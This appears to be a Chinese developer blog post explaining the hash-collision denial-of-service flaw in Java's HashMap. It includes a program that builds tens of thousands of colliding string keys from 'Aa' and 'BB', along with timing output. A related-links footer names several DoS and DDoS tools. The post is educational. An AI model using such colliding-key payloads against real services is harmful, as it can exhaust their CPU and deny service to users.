`
zhangyeny
  • 浏览: 30657 次
  • 性别: Icon_minigender_1
  • 来自: 厦门
社区版块
存档分类
最新评论

Hash表的拒绝服务漏洞

 
阅读更多
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/**
 * 用来模拟HashMap的拒绝服务攻击,因为hash表存放数据的时候如果HashCode值相等,
 * 首先用hash值确定tables的索引【index】,得到entry,然后将自己加入entry链的头部
 * 原来的值就成为它的next,这也是为什么entry有Next
 * 则这个相同的HashCode上用链表的形式去存放HashCode相等的值,如果相似的Code
 * 太多,这个链表将很长,一个简单的查询将耗尽所有的CPU
 * @author wb-zhangye
 *
 */
public class HashDenyService {
	/**
	 * 存放要放入hash表中hashcode相同的字符串
	 */
	private static List<String> DEPOSITORY = new ArrayList<String>();
	
	/**
	 * HashMap存放多个hashCode相同的键
	 */
	private static Map<String, String> DENYMAP = new HashMap<String, String>();
	
	/**
	 * 要放入hash表中的相同hashCode的个数,用 2 的POWER次幂表示,
	 * 例如 2^15
	 */
	private static int POWER = 15;
	
	
	public static void main(String[] args) {
		
		/**************************************************
		 ***************构造多个hashCode相同的Map***********
		 **************************************************/
		System.out.println("-------------attack---------- ");
		Long beginTime = System.currentTimeMillis();
		
		String xx = "Aa", yy = "BB";	// xx 与 yy的hashCode值相同
		String[] arrays = { xx, yy };
		perm(arrays, null);
		
		for(int i = 0; i < DEPOSITORY.size(); i++){
			DENYMAP.put(DEPOSITORY.get(i), "xx" + i);
		}
		
		Long endTime = System.currentTimeMillis();
		System.out.println("-------------cease fire---------- ");
		System.out.println("一共耗时" + (endTime - beginTime));
		
		
		/**************************************************
		 *************在Map中取出一个key对应的value*********
		 **************************************************/
		System.out.println("-------------start get Service---------- ");
		Long xstartTiem = System.currentTimeMillis();
		
		String tempData = DENYMAP.get(DEPOSITORY.get(30));
		int code = hash(tempData.hashCode());
		int index = code & (64 - 1);
		System.out.println("index is " + index);
		
		System.out.println(DENYMAP.get(DEPOSITORY.get(30)));
		Long xendTime = System.currentTimeMillis();
		System.out.println("一共耗时" + (xendTime - xstartTiem));
		System.out.println("-------------end end Service---------- ");
	}
	
	public static int hash(int h) {
        h ^= (h >>> 20) ^ (h >>> 12);
        return h ^ (h >>> 7) ^ (h >>> 4);
    }

	/**
	 * 构造多个hashcode相同的字符串,放入DEPOSITORY中
	 * @param arrays
	 * @param paramList
	 */
	public static void perm(String[] arrays, List<String> paramList) {
		int length = arrays.length;
		for (int i = 0; i < length; i++) {
			List<String> tempArray = null;
			if (null == paramList) {
				tempArray = new ArrayList<String>();
			} else {
				tempArray = paramList;
			}
			if (tempArray.size() <= POWER) {
				List<String> tempList = new ArrayList<String>(tempArray);
				tempList.add(arrays[i]);
				perm(arrays, tempList);
			} else {
				DEPOSITORY.add(transferStr(tempArray));
				return;
			}
		}
	}
	
	private static String transferStr(List list){
		int length = list.size();
		StringBuilder builder = new StringBuilder();
		for(int i = 0; i < length; i++){
			builder.append(list.get(i));
		}
		return builder.toString();
	}
}
	



Output


-------------attack----------
-------------cease fire----------
一共耗时99433
-------------start get Service----------
index is 27
xx30
一共耗时0
-------------end end Service----------
分享到:
评论

相关推荐

    信息系统安全考题.pdf

    (A) A、拒绝服务 B、文件共享 C、BIND漏洞 D、远程过程调用 2. (单选题)为了防御网络监听,最常用的方法是:(B) A、采用物理传输(非网络) B、信息加密 C、无线网 D、使用专线传输 3.(单选题)一个数据包过滤...

    Kali Linux渗透测试(安全牛).txt

    │ 任务134:拒绝服务工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye.mp4 │ ├─第17章 免杀 │ 任务135:恶意软件、防软件、免杀技术、当前现状.mp4 ...

    基于虚拟散列安全访问路径VHSAP的云计算路由平台防御DDoS攻击方法

    在研究大规模网络防御DDoS攻击的安全覆盖服务SOS(security overlay service)方法的基础上,揭示了SOS在节点被攻击时退出机制存在的安全漏洞,根据云计算路由策略改进了一致性散列算法 Chord,提出了适用于云计算...

    计算机网络安全题库(67道).docx

    ——[单选题] A 拒绝服务 B 字典攻击 C 网络监听 D 病毒程序 正确答案:A 计算机网络安全题库(67道)全文共12页,当前为第2页。 计算机网络安全题库(67道)全文共12页,当前为第2页。 7、()病毒是定期发作的,可以设置...

    cmd操作命令和linux命令大全收集

    8. services.msc---本地服务设置 9. oobe/msoobe /a----检查XP是否激活 10. notepad--------打开记事本 11. cleanmgr-------垃圾整理 12. net start messenger----开始信使服务 13. compmgmt.msc---计算机管理 ...

    JAVA上百实例源码以及开源项目

     [MonthMaker.java] 月份表算法类  [Pallet.java] 调色板,统一配色类 Java扫雷源码 Java生成自定义控件源代码 2个目标文件 Java实现HTTP连接与浏览,Java源码下载 1个目标文件 摘要:Java源码,网络相关,HTTP ...

    JAVA上百实例源码以及开源项目源代码

     [MonthMaker.java] 月份表算法类  [Pallet.java] 调色板,统一配色类 Java扫雷源码 Java生成自定义控件源代码 2个目标文件 Java实现HTTP连接与浏览,Java源码下载 1个目标文件 摘要:Java源码,网络相关,HTTP ...

    java开源包1

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包11

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包2

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包3

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包6

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包5

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包10

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包4

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包8

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包7

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包9

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

    java开源包101

    PortGroper 是一款java写的开源拒绝服务测试工具,它不是僵尸网络类的ddos,而是使用大量的代理作为bots发起DDOS。Port Groper可以与用测试防火墙,干扰web 统计脚本的跟踪,为网站增加流量..往好了用什么都能干,就是...

Global site tag (gtag.js) - Google Analytics